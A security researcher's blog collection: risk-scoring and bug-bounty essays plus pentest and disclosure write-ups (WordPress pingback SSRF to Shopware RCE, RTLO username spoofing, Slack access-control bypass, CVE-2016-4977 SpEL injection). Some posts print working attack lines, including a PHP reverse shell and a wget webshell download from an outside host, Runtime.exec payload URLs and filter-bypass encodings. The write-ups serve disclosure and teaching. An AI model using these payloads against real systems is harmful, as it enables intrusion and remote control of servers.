How to evolve an alternative approach to risk assessment (Part I)

Dec, 13th 2020

INTRO

This text aims to present an alternative approach to risk assessment. Unfortunately, many companies neglect risk management and information security because, for example, as a listed company, they have to meet the relevant requirements.
A dedicated employee or a small team is then assigned to this topic and then works on it in isolation. The other departments then come into contact with these colleagues once a year during IT auditing and then fill up entirely by surprise and then feel an inevitable gap that they have to endure.
And how do you bring information security into line with today's fast-paced world of work, for example, in eCommerce, when every feature, no matter how small, is essential not to lose touch with the industry leaders?
How can you ensure no bottleneck in an agile development environment if you want to subject every feature to a thorough security check before going live? Business first / feature first mentality? Business vs. Information Security?
How about, however, if the management firmly believes that information security is an integral part of the relationship of trust with customers and business partners?

PRECONDITION

In this case, we consider a company with 2,000+ employees. The management prioritizes the importance of information security and data protection and attaches great importance to ensuring that ALL employees receive appropriate basic training.

Develop the value chain and protection requirements

It is important to work out with the management in joint meetings and workshops how the company earns money and what the value chain looks like accordingly. The next step is to relocate the value chain into individual elements and determine the crown jewels. A protected object classification is then required. Once this has been defined, it can be determined together with the management what requirements or protection requirements these protected objects have in terms of confidentiality, integrity and availability. This is used to derive the security priority, the required trust boundaries and the priority with which a security incident can be processed.

NECESSARY TRAINING AND AWARENESS

Security concerns us all. It is important to sensitize every employee to the topic and explain that each employee is part of the overall concept in information security and that we can only be successful if we work together. All employees are important and must be valued - this also includes mandatory basic training for information security - regardless of whether they work in the IT department, in purchasing, marketing or as a craftsman and caretaker.

IMPORTANT MILESTONE

As soon as a relationship of trust and openness to information security has been established in the organization, the employees will approach the members of the security team by themselves and ask questions or point out phishing and scam campaigns. It is important to thank these employees for their awareness and express that they are essential to customers, partners, and employees. That is an important milestone.

Next step - decentralized data protection and security management process

What does the company structure and organization chart look like? Are there project managers or product managers? Suppose this is the case, and they are responsible for product development and the implementation of business goals. In that case, it can be worked out with them in dedicated workshops that they are also data owners and are therefore responsible for data protection. If everyone has this common understanding, we can integrate them into decentralized data protection and security management group. At the latest, something will change - namely that the IT revision or the security team no longer proactively approaches the team or product owner and wants to carry out a security audit. Instead, the product owner recognizes the added value and proactively requests security audits and have it carried out.

WHICH SCORING SYSTEM FITS BEST?

From the point of view of weak point management, we know established scoring methods and systems such as "CVSS", "D.R.E.A.D.", "S.T.R.I.D.E." and more. However, these are often technical, and one has the feeling that too much subjectivity influences the result. For example, a web security expert will presumably rate the attack vectors "CSRF", "XSS", and "local file exposure" more critically than a thoroughbred system administrator who probably will immediately associate the vulnerability with "remote code execution" or "SQL injection" and then rate it as anything but low per se. So if the technicians already disagree, how should then, especially non-technical product owners, understand the assessment?

INTRODUCING AN OWN RISK SCORING SYSTEM

First of all, it is essential to note that this proposal introduces a risk management process that is accepted and understood by the workforce and that the responsible owner received the relevant workshop and brief introduction into how to understand the questions and the most important questions. The aim should be to objectively ask a maximum of ten questions that can show the person responsible at a glance whether they must remedy this risk immediately or whether the person responsible can consciously accept the risk for a period of a few weeks in favor of the business priorities.

QUESTIONS TO BE ASKED for a proper RISK evaluation

The following questions do not fit into every context and not every company, but instead represent an example that has worked well for me. It serves only as a suggestion and should by no means be adopted one-to-one. They can be implemented in a web form so that you have the static questions and the answers can be chosen from a drop-down menu or if necessary from a multi-select field.

Are sensitive information at Risk?
YES: PII
YES: trade secrets
YES: intellectual property (i.e. source code)
NO

CIA: does the issue harm the confidentiality, integrity, or the availability of the affected information?
confidentiality
integrity
availability

Is user-interaction (victim) needed for a successful exploitation?
YES
NO

Is the Risk publicly known?
YES: MITRE, CVE, BLOG, Social Media
YES: external Researcher reported to us
YES: Customer or Partner reported to us
NO

Could we verify the finding with our 5 commonly known sec tool?
YES
NO

Are there log files that we can investigate?
YES
NO

Are detective measures in place?
YES: monitoring
YES: email alerting
NO

Can we immediately apply quick-win remediation until it will be proper fixed?
YES (i.e. CAPTCHA, THROTTLING, ISOLATION, FIREWALLING).
NO

RISK SCORE EVALUATION

Based on these 8 questions we can setup a proper risk score evaluation and define numeric values to it which we can then put in addition. In my case, the score will come up to the conclusion that the Risk is "severe" and therefore has to be handled urgent (i.e., within three days) or otherwise the Risk is mediocre and should be taken care of in the next 90 days. In my next blog post (part II) I will guide you through three real-life examples and share the scripts which allows you to automatically get a proper Risk evaluation based on these criterias.

Stay tuned!
Feel free to give me feedback, insights, thoughts on Twitter: @secalert

communication in bug bounty programs (as triager, researcher, manager)

Dec, 12th 2020

INTRO

After an exciting exchange with some people on this topic, I decided to explain my perspective and fact of view because, since 2009, I have been able to learn and to work on the different sides of the security bug bounty world. During this period, I gained experience as a Researcher/Pentester on one side and as a program manager for three companies that operate their private bug bounty program on the other side.

WE ARE HUMANS WITH EXPRESSIONS, and EMOTIONS

I had many exciting and lively exchanges on both sides of the coin, but I don't want to deny a high level of frustration on both sides.

After a few years dealing with bug bounties, I realized that one could only achieve the right balance if you receive appropriate interpersonal communication training and learn how to communicate gently and with absolute compassion on an interpersonal level.

It is essential always to remain polite and approach the other person with respect and understanding - this is especially true for written texts, as you cannot read the other person's emotions on their face and facial expressions.

REAL LIFE EXAMPLES AS A TRIAGER

In the following section, I would like to show you examples from my own experience that were (a bit) frustrating, how they ultimately turned out and what was needed to defuse the situation as early as possible in human-to-human communication.

IMPORTANT:
1. Everything written here is my personal view and does not represent my employer! :)

2. Thank you to the affected Researcher for permitting me to cite texts from their messages/emails/reports and show the situations and learn from them.


CASE 1: AS A TRIAGER
As a "triager" I regularly received reports from Researcher, Pentester, ethical Hacker, Hobbyists and Bug Hunter, which had much potential for improvement. To make things easier in this text I will use the term "Researcher" instead of picking one of the other titles. Since basically anyone can participate in most bug bounty programs without a certificate of education: grammar and spelling are often severely neglected, which is a fact to be accepted.
If the Researcher doesn't understand or poorly understands the attack vector, he/she is about to report; things get tricky.


TRIAGE EXAMPLE 1:
I received a report regarding a potential CSRF issue. The Researcher wrote the following description:

"CSRF enables the attacker to gain remote access to the admin's desktop and all the files he has stored there."

At this point, I could have rated the ticket as "N/A" or "incomplete" because of this description. But that's not what I want. It is my responsibility to ensure that we can either verify the potential risk or refute its existence. It is always important to me to pursue this and to contribute constructively to the solution. It is also essential to invest the time with colleagues to determine when we introduced the vulnerability and whether an evil actor exploited it in the last 14 days (or for how long you can keep log files in the respective context).

Personally, I have my claim to fulfill an educational mandate.
After verifying the presence of the CSRF vulnerability, I replied to the Researcher.
I told him/her that this attack scenario was exceptional and did not apply to our web application.
Instead, I explained to him/her an attack scenario that applies to us - with the goal and hope that the researcher has a better understanding when he/she reports another CSRF to us next time.


TRIAGE EXAMPLE 2:
A Researcher reported a race condition which occured under certain rare circumstances that would lock the database access, raise an error and leak internal credentials. The Researcher wrote in imperfect English:

"Hi Sirs and Madams, you have code execution in database I get sugar secrets..."

Again, I could reply with "N/A" or "can't reproduce" and move on.
Instead, I read his/her text three times and had a hard time understanding due to the language barrier, so I looked at the screenshots and python script he/she sent us.
After reading the source code, I had a clue what he/she was trying to achieve, but it did not immediately work as a reliable proof of concept. So I took the time to investigate, reviewed the source code to ensure that it does not contain any backdoor or malicious code and afterwards I ran the script in multiple threads against our all of the database (and replica) servers.

After a while, I could reproduce the issue and finally got the expected results.
It turned out that this was a race condition and only applied to one specific database replica server because it had a different configuration used manually in one case for debugging purposes.
The person in charge forgot to undo the changes after the debugging session.
We could immediately fix the issue.

Once solved, I wrote to the Researcher, told him/her the steps needed to reproduce it, and gave him/her a template which he/she can use for such issues in the future.

REAL LIFE EXAMPLES AS A RESEARCHER

As a researcher, I've reported many issues and potential risks to several companies. Sometimes, there was a critique or misunderstanding due to different skills or the language barrier, but it was finally an enjoyable experience and communication. In conclusion, I've had more positive than negative experiences with (private) bug bounty programs.


RESEARCHER EXAMPLE 1:

I remember a case very well where I've received a low bounty due to my initial proof of concept. Three weeks later, the company increased the bounty to the highest amount because their internal security team found other systems affected by the same issue and root cause.


RESEARCHER EXAMPLE 2:

By accident, I've identified a template injection which lead to RCE on a well-known web site. You wonder how? I've visited the website as a customer, and the rendered HTML showed me some errors. My curiosity made me look for the used frameworks. I then downloaded these frameworks and started my research, which finally led to RCEs I've identified and became known as CVE-2016-4977. When I contacted the company and sent them a report with my research, they told me they ran a private bug bounty program and asked me to register for the program. I did so, and after a few days, I got a bounty for these findings. That was pretty generous of them. They could have taken it for free or invite me to the program but tell me that I would not receive a reward because I sent them the report before being part of the program. I am very thankful for how they handled this.


RESEARCHER EXAMPLE 3:

It happened to me three times that I've reported an issue, which they triaged and verified quickly, but then months passed without a reply. Finally, I received the message that this program has ended because it is not active anymore, which meant that I did not receive any reward. Of course, I was very frustrated and tried to involve a Mediator who, in all three cases, told me that there's nothing he/she can do once the company quits the bug bounty program. Finally, I had to accept it and move on.

Are there any lessons learned for me?
Yes, sure. I learned that I have to ask for an update before the six-month period ends, for example, after three months and if they don't reply after four months, kindly ask once again.
This time tell the company that if they don't respond after five months, I will request mediation on the bug bounty platform and hope for a polite treatment.

GENERAL THOUGHTS, TIPS

My recommendations to researchers:

Thank you for your efforts to make the Internet more secure! You are amazing!

1. Be polite and invest the time to describe an attack scenario that applies to the actual web site/service you have performed a penetration test.

2. whenever possible, include a video as proof of concept, especially if chances are high to run into language barriers.

3. It is nice to know and to be able to reference to "ASVS", "CVSS", "CWE", "D.R.E.A.D.","STRIDE", and similar scoring methods, best practices or standards - but in my experience, to the affected company, it is often more important to have the following questions answered as early as possible in your report:

3.1. are PII (especially "GDPR" article 9) at Risk?

3.2. CIA: does the issue harm the confidentiality, integrity, or the availability of the affected information?

3.3. Is user-interaction (victim) needed for a successful exploitation?

3.4. Is authentication needed for an successful exploitation?

My recommendations to Triagers:

Thank you for your efforts to make the Internet more secure! You are amazing!

1. Please be polite, keep calm and believe in the positive in the human being.
If you think the Researcher is rude: maybe it's only due to the language barrier or lack of skill.

2. Keep in mind that (sensitive) information (i.e. PII) may be at Risk.
If the Researcher did the wrong CVSS rating, maybe the attack vector does not fit best with CVSS. Please don't let this be the only reason for you not to investigate the issue properly. Instead, correct the CVSS and give the issue the importance needed!

3. If you don't understand the issue or it's impact, please take the time to ask your questions to the Researcher.

4. If you come to the conclusion that it is "n/a" or "can't reproduce", please take the time to explain it to the Researcher and if possible give them a hint what they can do better next time.

5. As the triager you have to know which kind of information are at Risk on the vulnerable system. If you don't know, feel free to ask the responsible owner. The Researcher often times will not have internal information such as a full list of protection worthy data, flow diagrams, database schemas, threat models and abuse potential analysis - so forcing them to guess which kind of information "could" be at Risk is a waste of time and will most likely frustrate the Researcher and you as a triager.

My questions to a company that wants to join a (public) security bug bounty program:

1. Are you aware that running a security bug bounty program is very time-consuming?
Most likely, you should plan a full-time employee for this!

2. Do you have employees that have the skills needed to verify the (technical) security issues?

3. Do you have a program manager trained in terms of interpersonal communication, rhetorics and can keep calm? Someone who acts as a mediator if the Researcher is rude or frustrated; to ensure that the situation does not quickly escalate personally?

4. As the responsible owner and person in charge, you have to know which kind of information is at Risk on the vulnerable system. If you don't know, how can you expect the Researcher to know?

5. Please consider sharing information such as a list of protection worthy data, flow diagrams, threat models or abuse potential analysis to the Researchers (with NDA and permission to attack)

6. Are you able to offer a staging system so that the Researcher do not have to penetrate your production systems?
If not please be aware that it can occur that your production system gets harmed.

7. If you want to share the security report with your colleagues in a ticketing system like JIRA, consider sharing a template with the Researcher, so that the researcher can supply you a formatted report. :)

My question to the owner of public bug bounty platforms:

1. Do you treat the companies and the researchers on your platform alike?

2. Do you have trained personnel to mediate and help whenever the communication between the "triager" and the researcher escalates?

3. Do you force the researcher to describe i.e. OWASP Top10 risks over and over again instead of offering them a well-written description for common weaknesses?

Please keep in mind that as a platform, you can take the burden from the shoulders of the researcher and triagers if you offer the opportunity for them to select the description from a drop-down menu instead of letting them describe and potentially falsely represent these issues.

4. Do you encourage the employees of the companies that wants to join your program to learn the basics of (web) security issues before they have their own "triagers" participating in the program?

5. Are you willing to remove a triager or researcher from the program who misbehaves in the communication at any time?

6. Whenever possible: do you offer target scope definitions as configuration files for the most common security tools?

THANKS FOR YOUR ATTENTION

Okay, that's it.
I hope you can take anything from my blog post or rethink your opinion about the other side of the medal. :)
Feel free to give me feedback, insights, thoughts on Twitter: @secalert

FROM ZERO INFO TO ZERO-DAY :)

June, 30th 2020

INTRO

In this blog post I will write about my thinking processes during the respective security audit and share my failed attempts with you as well. I hope that we can inspire motivate each other in the community to stay tuned and learn from ideas that were not successful in the particular case but can be used in the future in other (corner) cases for success.

TL;DR:

We will perform information gathering, bypass filter, abuse a SSRF, discover a zero-day RCE during research and finally exfiltrate sensitive information.

PREPARING THE PENTEST AND SCOPE

Back in 2016, I had performed a penetration test for which I received minimal information upfront. The goal was to infiltrate the target and access their internal systems or to exfiltrate (sensitive) internal information.

The scope was *.targetcompany.com!

INFORMATION GATHERING

During the information-gathering phase, I crawled the web site and extracted the frameworks revealed in the HTML source or HTTP response headers. Once this step was finished, I manually reviewed the structures and started to look for version disclosures.

I quickly discovered that the company's blog was WordPress. So one obvious step for me was to check if I can access any admin interfaces or files without login.
That was not the case here, so next I checked the rendered HTML source and found a reference to the "xmlrpc.php" file.

When I tried to access the file, the server returned a "404 not found" error message. Since the file was referenced in the HTML code, I thought that they were probably using a WAF and had the "xmlrpc.php" on a blocked-list for any access from an IP address which is not part of their company network.

FILTER BYPASS

So quite naturally, I attempted to bypass the blocked-list by using the following encoding combinations:

1. add a slash to the URL like this "https://blog.targetcompany.com//XMLRPC.php"
2. urlencode the slash once: "https://blog.targetcompany.com/%2fXMLRPC.php"
3. urlencode the slash twice: "https://blog.targetcompany.com/%252fXMLRPC.php"
5. urlencode the slash once and urlencode one other char:
"https://blog.targetcompany.com/%2fXMLRPC.ph%70"
6. urlencode the slash and one other char twice:
"https://blog.targetcompany.com/%252fXMLRPC.ph%2570"

Success!
The successful condition utilized double URLencoding. The WAF/Application was decoding the user-submitted input only once before performing the string-comparison with the strings in the blocked-list.

So the 6th payload with double URLencoding bypassed their filter, and I now could access the "XMLRPC" controller from an external IP address.

The next step was to check by exploiting the existing endpoint, if it is possible to perform out-of-band HTTP REQUESTS.
Next, I looked if they have an older version of the "XMLRPC" controller in place so that I could use the "pingback.ping" method to make outbound requests to my external server and expose internal IP addresses or other routes that, for example, are not behind a DDoS protection like the one that Cloudflare or AKAMAI offers.

To verify if the "pingback.ping" method is available; I posted a request to list the available methods.



The "pingback.ping" method is available on the target system. Nice!

The next step is to check if we can make out-of-band HTTP requests so that we can potentially abuse this like a Server-side Request Forgery (SSRF) later and use it to gain access to internal hosts and (sensitive) internal information.



The HTTP request was successful, however I was yet to gain access to any potentially sensitive information. At this point in time, I could enumerate or brute-force internal server names.

I decided to check for internal hostnames by using "crt.sh" or a similar service, which would help me to quickly identify subdomains or internal-only hosts due to the leak of the hostnames in the public SSL certificates.

I found a few generic sounding subdomains like "portal.int.targetcompany.com", "backend-cms.int.targetcompany.com", "checkout.portal.int.targetcompany.com", but I did not know what software was running there. But one that caught my attention was:
http://shopware.int.targetcompany.com

Next, I spent my time looking for publicly available exploits in Shopware that would allow me to obtain code execution. However, no exploits were found so I decided to dig down deeper and hunt for zerodays in Shopware by myself.

ZERODAY RESEARCH

I decided to download the source code of shopware and hunt for zeroday vulnerabilities. After a couple of hours of research, a remote code execution was identified in the "/backend/Login/load" module. Next, after investigating the root cause and identify the sinks I wrote a proof of concept exploit code for it and verified it on my local Shopware installation so that I can add this exploit to my exploit chain in this pentest.

ATTACK SCENARIO

Now my attack scenario looks like this:
1. bypass the filter to access restricted methods such as "pingback.ping" in the "xmlrpc.php"
2. Use the "pingback.ping" method to make a HTTP GET request to the internal Shopware
3. with the RCE exploit I can finally spawn a reverse shell on the target system or exfiltrate internal information

(INCOMPLETE) TRUST BOUNDARIES


This is an incomplete Threat Model in order to identify the trust boundaries I had in my mind.

EXPLOITATION

The final chained exploit code looked like in the next screenshot.
So that it can be read easily I've attached it in plaintext in the picture. Hint: The original request was URL-encoded before being sent.



At this point we could also have tried to spawn a reverse-shell like this:
${{`php -r '$sock=fsockopen("secalert.net",23232);exec("/bin/sh -i <&3 >&3 2>&3");'`}}
or place a web shell on the target system like this:
wget http://secalert.net/exploits/reverse-shells/webshell.php;chmod +x webshell.php
and from this point use the web shell instead of the issue in Shopware.

FINAL THOUGHTS

I had lots of fun while performing this pentest. I was thrilled to find any exploitable issue in Shopware because I was highly motivated to gain access to internal systems and data.
My research of the Shopware source code lead to CVE-2016-3109

After the pentest the target company told me that they were evaluating Shopware on this internal system and had not yet put efforts in protecting it.

Fortunately, there are many talented people in the infosec community today who share their findings with us and blog about them or post them on Twitter. Thanks for that.
You are awesome!

Unfortunately, these posts are sometimes short and focus on the final exploit code and show the happy path without giving more in-depth insights into the researcher's mindset. In my opinion, these thoughts are worth their weight in gold and are incredibly inspiring.

Hopefully, this article gave you insights and motivates you to keep focus and don't give up if you cannot quickly find severe issues in your target scope.

THANKS

I want to thank the Shopware Team for a very friendly and professional communication when I contacted them and supplied the proof of concept for what later became CVE-2016-3109.

Also I want to thank the following individuals for proof-reading this blog post:
@cschneider4711
@garethheyes
@irsdl
@janmuenther
@rafaybaloch
@RobinVerton
@payloadartist

REFERENCES

There are a few nice articles about other researches regarding the "xmlrpc" controller:

1.https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-alert-wordpress-xml-rpc-brute-force-scanning/

2. https://www.acunetix.com/blog/articles/wordpress-pingback-vulnerability/

3. https://blogs.akamai.com/2014/03/anatomy-of-wordpress-xml-rpc-pingback-attacks.html

4. If you know other cool articles, drop me a message and I will add the references :)

from RTLO to alleged admin

JUL, 4th 2020

INTRO

In this blog post, I want to share a little issue I had first discovered back in 2018 that can be used as part of your Security Awareness campaigns.

TL;DR:

I couldn't register as admin or Administrator, so I registered as another user and afterward changed my username using Unicode because I wanted to trick the web application to show it as "administrator" and thus facilitate phishing attacks.

PRECONDITION

Frequently the registration controller is disabled. I would still recommend to check if it is enabled and accessible when hunting for issues.

REGISTRATION

The target web site allowed a customer to register and post comments in WordPress located at:
https://blog.targetcompany.com/wp-login.php?action=register .

I had tried to register with familiar names like "admin" or "administrator," which was not allowed. So I tried registering with Unicode look-a-like characters that would look pretty much the same as "admin", but it still a different name. It did not work.

So I registered using "administrators" with a trailing "s". I had received an email for double-opt-in and verified the registration by visiting the link:
https://blog.targetcompany.com/wp-login.php?action=rp&key=bqbhs8qJydZH4IT7SZ90&login=administrators

side finding:
It is worth mentioning that it is a problem that my username in the "login" param is exposed to 3rd party web sites in cleartext in the HTTP referrer header, which itself could already be a GDPR case.

REGISTERED! WHAT NOW?

I've successfully registered as "administrators", but there not much I could to with it because I am still a normal user. So I was wondering if the registration process works the same as the change username process?


I tried to rename my username from "administrators" to "admin". WordPress did not allow me to change to this username.

UNICODE FTW?

Next I thought about RTLO (right-to-left override) which is U+202E in Unicode.

So I tried to rename it to:
%E2%80%AErotartsinimda

which consists of %E2%80%AE which is the URLencoded string of the RTLO sequence and rotartsinimda which is the reversed string of "administrator".
This was accepted.

Next I then navigated to the comment section to verify if the RTLO has worked or the web application shows my username as rotartsinimda.


The RTLO sequence worked, and in the web browser, it was successfully parsed and was shown as "administrator".
This fact facilitates phishing attacks because an average user would trust if an administrator posts a comment such as "Your session has Please click here to relogin" with a link pointing to an attacker-controlled domain like https://blog.targeetcompany.com/ or similar.

FINAL THOUGHTS

In fact, it is a low-Risk issue, but in my opinion, it can be used as an "eye-catcher" in your Security Awareness campaign.

THANKS

I want to thank the private bug bounty programs for the bounties and therefore the opportunity to donate it to needy humans who well deserves our help.

REFERENCES

https://www.fileformat.info/info/unicode/char/202e/index.htm

Slack, a brief journey to mission control

Oct, 20th 2016

Intro

In this blog post, I will describe my thoughts while hunting for security issues as part of Slack's bug bounty program which resulted in the findings of https://hackerone.com/reports/129918 and https://hackerone.com/reports/130133

Thanks to the Slack security team

I want to thank Leigh Honeywell and Max Feldman of the Slack security team for the gentle, professional communication and coordination in the bug reporting process.

Information gathering

To understand the infrastructure and gain information about the used framework, I started to check the HTTP response header. I saw that Slack is using an Apache httpd server. So I tried to identify common Apache directories and directives like /icons/README, /manual/, /server-info and /server-status.

May I access your internal data, please?

Slack runs mod_status on the web server. The Status module allows a server administrator to find out how well their server is performing and which resources have been requested by which ip addresses. An attacker may make use of this information to craft an attack against the web server.

https://secalert-hackerone.slack.com/server-status

When I tried to access server-status directive, the server redirected me to a login page located on the *.tinyspeck.com domain. So this path has been protected.

Out of scope domain! Now what?

If you are lazy, be warned that brute-force is not permitted by the Slack bug bounty program's rules. So one would now try to bypass the login page with some injection techniques, but unfortunately, the login page itself is located on a FQDN outside of the allowed scope, so this was not an option. I had to find a way to stay within the allowed scope of secalert-hackerone.slack.com.

Routing? Filter? - Blind testing

First of all, I thought, that if they are using Apache httpd and mod_status, the redirect could be triggered using the rewrite module. The mod_rewrite module is a powerful module for Apache used for rewriting URLs on the fly. However, with such power come associated risks; it is easy to make mistakes when configuring mod_rewrite, which can turn into security issues. Take, for example, one of the configurations in the mod_rewrite documentation:

RewriteRule ^/somepath(.*) /otherpath$1 [R]
If this is the case, they could probably have misconfigured the RewriteRule and therefore I could bypass it by simply adding a slash. Why? Requesting
http://yourserver/somepath/secalert
will redirect and return the page http://yourserver/otherpath/secalert as expected. However, requesting
http://yourserver//somepath/secalert
will bypass this particular RewriteRule. In case of Slack it was not possible to bypass it this way. So I had to think outside the box.

I was playing around with representations of a slash in order to potentially bypass a simple string based filter protection.
https://secalert-hackerone.slack.com/%2fserver-status%2f
https://secalert-hackerone.slack.com/%252fserver-status
I played around with the RTLO sequence in order to bypass the filter by submitting the RTLO sequence followed by the reversed string.
https://secalert-hackerone.slack.com/{u+202e here}sutats-revres
https://secalert-hackerone.slack.com/%e2%80%aesutats-revres
which did not work at first.

Access control bypass!

After a few tests I thought, that they could use a Route Map in their framework and that I potentially could bypass the routing mechanism or access control by adding multiple forward slashes in case that the applied filter checks if the string starts with a particular string and does strip a forward slash, but eventually miss to strip all slashes recursively, and this finally worked.

https://secalert-hackerone.slack.com/////server-status
Success!

Bounty as low as $50?

While writing the report for Slack on hackerone I decided to add some screenshots as proof of concept. At this point I thought that I would earn the minimum bounty of $50 for reporting this misconfiguration issue, because the server-status file usually would not expose any sensitive information to me if the requested resources are part of my own Slack workspace, right? Well, i logged out of my Slack account and requested the server status without being logged in! That means that an attacker would potentially gain unauthorized access to the requested resources of ANY Slack site by accessing the server-status directive of a given workspace!

Secrets exposed, increased bounty!

I realised that there are some requests listed like /callbacks/chat.php?secret=... and /users.list?token=... ,which definitely are sensitive data. So I added some screenshots, which most probably increased the bounty I finally received. Thanks again to Slack for that generous bounty.

Google indexing

After receiving the first bounty from Slack, which has been generous, I was motivated to hunt for further issues. I googled for common file extensions on the Slack web sites and found cached URLs, which indicates that Slack does have or had a back-end admin panel, which Google indexed in the past. When I tried to access these pages, I got redirected to the login page once again. But since Slack resolved the prior reported issue, chances were low, right?

Backend access -> second bounty!

The Slack employees have access to a backend admin panel called mission control. In the mission control panel, authorized people can read lots of meta data related to Slack user and Slack workspace by passing an id to the corresponding controller. Since the needed "id" is being exposed in the rendered HTML of my Slack workspace, I read the metadata associated with my own account and sent these screenshots to the Slack security team. Besides that, it was identified that an attacker would be enabled to reset the password of any user by guessing their "id" and passing a request to the associated reset controller in the mission control panel. This would allow an attacker to take over any account! For this issue, I received an additional bounty.

Outro

Be patient! Sometimes you may identify a flaw that seems to be trivial from a technical point of view, but may raise a high business impact or an increased data privacy issue to the affected company, so that they could rate the risks different than you initially thought.

Apr, 11th 2016: issue identified and reported
Apr, 11th 2016: verified by slack
Apr, 13th 2016: issue fixed
Apr, 13th 2016: received a bounty of $2000 for https://hackerone.com/reports/129918
Apr, 14th 2016: identified and reported second issue
Apr, 14th 2016: issue verified by slack
Apr, 24th 2016: issue has been globally fixed
Apr, 24th 2016: additional bounty of $7000 for https://hackerone.com/reports/130133
Oct, 20th 2016: this write-up has been published

CVE-2016-4977: RCE in Spring Security OAuth 1&2

Oct, 13th 2016

Affected version

  • Pivotal Spring Security OAuth 2.0 - 2.0.9
  • Pivotal Spring Security OAuth 1.0 - 1.0.5

Background

A couple of months ago, I performed a security audit against a web application that used the Spring Security OAuth framework for authorization. During my research, I have identified some issues, including remote code execution flaws. The web application implemented the Spring Security OAuth framework, which comes by default with a template prone to RCE! One would believe that this one is secure by default, but indeed it was not. During my research, I realized that a couple of well-known websites also implemented the vulnerable code.

Spring Boot Demo

If you want to verify the issue yourself, you can download the spring boot demo application as a maven project from http://secalert.net/research/cve-2016-4977.zip.

Let's get started

Usually one would run the demo application by passing a legit request like:

http://localhost:8080/oauth/authorize?
response_type=token&client_id=secalert&scope=openid&redirect_uri=http://localhost
Everything works as intended. I then started to look for common issues like XSS:
http://localhost:8080/authorize?response_type=token&client_id=secalert&scope=openid
&redirect_uri=<s>XSS</s>

This led to an error which showed the Whitelabel Error Page. Surprisingly there are lots of well-known websites which still use the Whitelabel Error Page instead of having configured a custom error page. The Spring Security OAuth example shows the Whitelabel Error Page by default whenever an error occurs. The Whitelabel View reflects parts of the given parameter values, which leads to XSS at first glance. After finding the XSS during blackbox testing I reviewed the source code to identify the vulnerable code before I report the issue to upstream. While reviewing the source code I realised that there is a more dangerous issue there.

Error handling calls "SpelView" endpoint

Let's review the source code of ErrorMvcAutoConfiguration.java.

/* Lines 137-148 of: https://github.com/spring-projects/spring-boot/blob/master/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/ErrorMvcAutoConfiguration.java */

private final SpelView defaultErrorView = new SpelView("Whitelabel Error Page"+ "This application has no explicit mapping for /error, so you are seeing this as a fallback."+ "${timestamp}"+ "There was an unexpected error (type=${error}, status=${status})."+ "${message}");
@Bean(name = "error")
@ConditionalOnMissingBean(name = "error")
public View defaultErrorView() {
        return this.defaultErrorView;}

The user supplied values are passed to the org.springframework.security.oauth2.provider.endpoint.SpelView Class which is using the SpelExpressionParser of oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/SpelView.java.

Source code: /spring-security-oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/SpelView.java
...
import org.springframework.expression.spel.standard.SpelExpressionParser;
...
private final SpelExpressionParser parser = new SpelExpressionParser();
private final StandardEvaluationContext context = new StandardEvaluationContext();
...
this.helper = new PropertyPlaceholderHelper("${", "}");
...
Expression expression = parser.parseExpression(name); ...

This is interesting. The Spring Expression Language (click here for detail) is the syntax used by spring for configuration and code place in annotations. To check if the param is also prone to Spring Expression Language Injection I then passed:

http://localhost:8080/oauth/authorize?
response_type=token&client_id=secalert&scope=openid&redirect_uri=${777-111}

The response message shows "666" which means that the proof of concept code has been evaluated!

Exploiting the RCE (on Linux)

http://localhost:8080/oauth/authorize?response_type=token&client_id=secalert&scope=openid
&redirect_uri=${T(java.lang.Runtime).getRuntime().exec("ls")}

Exploiting the RCE (on Windows,null_ref)

http://localhost:8080/oauth/authorize?
response_type=calc.exe${T%28java.lang.Runtime%29.getRuntime%28%29.exec%28toString%28%29.substring%28112,120%29%29}&client_id=secalert&scope=openid&redirect_uri=http://test

The hotfix

The maintainer released a hotfix: https://pivotal.io/de/security/cve-2016-4977

Race condition in the hotfix may be exploitable

If one reviews the applied bug fix one may conclude that the fix looks some kind of a partial fix. They try to prevent recursive placeholders in whitelabel views by using the org.springframework.security.oauth2.common.util.RandomValueStringGenerator class in order to replace the "{" prefix.

    /* Source code: "https://github.com/spring-projects/spring-security-oauth/blob/master/spring-security-oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/SpelView.java": */
...
public SpelView(String template) {
    this.template = template;
    this.prefix = new RandomValueStringGenerator().generate() + "{";
    this.context.addPropertyAccessor(new MapAccessor());
    this.resolver = new PlaceholderResolver() {
      public String resolvePlaceholder(String name) {
            Expression expression = parser.parseExpression(name);
        Object value = expression.getValue(context);
          return value == null ? null : value.toString();
      }
    };
        }
...
    String maskedTemplate = template.replace("${", prefix);
    PropertyPlaceholderHelper helper =
    new PropertyPlaceholderHelper(prefix, "}");
    String result = helper.replacePlaceholders(maskedTemplate, resolver);
    result = result.replace(prefix, "${");
    
This looks like a quick win solution, but if an attacker makes a sufficient amount of requests the RCE could still be exploitable due to a race condition since the RandomValueStringGenerator (click here for API docs) Class generates a string with the default length (6).

Whitelabel Error Page on production environment

As web developer or web admin you should consider disabling the whitelabel error page or use a custom error page with a generic text. Please refer to Point < code>77.2 Customize the whitelabel error page on http://docs.spring.io/spring-boot/docs/current/reference/html/howto-actuator.html

Timeline

Feb,  8th 2016: vulnerability discovered and reported to upstream
Feb, 14th 2016: upstream verified the issue
Mar, 12th 2016: upstream deployed a hotfix
Jul,  5th 2016: initial vulnerability report published by upstream
Oct, 13th 2016: this write-up has been published

A tale of an interesting source code leak

Mar, 27th 2016

Background

Lately, while participating in Bug Bounty Programs, I came across an interesting issue which was classified with the highest severity yielding a potential bug bounty. Due to it's terms, i am compelled not to disclose the name of the company.

Information gathering

I started with some information gathering and footprinting. I noticed that the files ends with the ".jsp" extension which often runs with Apache Tomcat. First I reviewed the http response header in order to gain some information about the target system:

HTTP/1.1 200 OK
Date: 16 Mar 2016 15:15:33 GMT

If the http status code is followed by the date response header in the second line it usually means that it the page is using an Apache httpd as web server. In this case I assumed that an httpd is used in front of an Tomcat web server. If i am right then they could probably be using some module to dispatch the files between the httpd and the Tomcat web server which means I could potentially trick the routing to expose the source code of any ".jsp" or ".inc" files by appending specific lower ascii characters - depending on whether they are using a Connector or Handler.

Connector, Handler, File Descriptor


